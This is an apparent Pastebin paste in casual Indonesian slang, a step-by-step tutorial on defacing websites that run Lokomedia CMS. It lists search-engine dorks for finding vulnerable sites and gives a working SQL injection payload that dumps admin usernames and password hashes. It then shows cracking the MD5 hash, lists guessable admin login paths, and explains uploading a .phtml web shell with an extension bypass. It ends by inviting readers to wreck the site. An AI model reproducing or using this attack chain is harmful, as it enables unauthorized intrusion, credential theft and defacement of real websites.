Advertisement
Guest User

Tutor Deface Website

a guest
May 4th, 2018
447
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.90 KB | None | 0 0
  1. Hello World ; Siang Fans, Please Say Hello Haters :*
  2. xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs,
  3. pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
  4. yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah
  5. yg ada pada CMS Lokomedia nih, kite suntik2an dlu,
  6. *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja,
  7. kali aja masih crotz
  8. Langsung aje Tutorial SQL Injection on Lokomedia CMS
  9.  
  10. Dork : - inurl:kategori-23-hiburan.html
  11. - inurl:hal-tentang-kami.html
  12. - inurl:statis-1-pengantar.html
  13. - inurl:statis-19-beasiswa.html
  14. - inurl:statis-22-kerjasama.html
  15. (kembangin lagi gunakan otak bokepers Lu,
  16. biar dpt yg Vuln and Verawan gengs ;*)
  17.  
  18. eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
  19.  
  20. 1. Dorking menggunakan Search Engine
  21.  
  22. 2. Pilih web target, Lalu masukan eXploitnya.
  23. di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
  24.  
  25. Sekarang sudah kelihatan user sama passwordnya di bagian title.
  26. kemudian ctrl+u untuk melihatnya lebih jelas.
  27.  
  28. Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 ,
  29. karena password masih dalam bentuk MD5 maka harus di decrypt,
  30. saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
  31. Kalian bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
  32.  
  33. Untuk login biasanya di :
  34. - www.target.c0li/admin
  35. - www.target.c0li/adminweb
  36. - www.target.c0li/administrator
  37. - www.target.c0li/redaktur
  38. Kali ini loginnya berada di target.c0li/adminweb/
  39. , Kemudian masukan user dan pass di form.
  40.  
  41. Untuk mengupload shell bisa dibagian Download
  42.  
  43. Untuk mengakses shell biasanya di target.c0li/files/namashellLu
  44. *Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3
  45.  
  46. Done, silahkan masuk ke shell lu:D
  47. Silahkan Acak" Webnya:v
  48.  
  49. Terimakasih.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement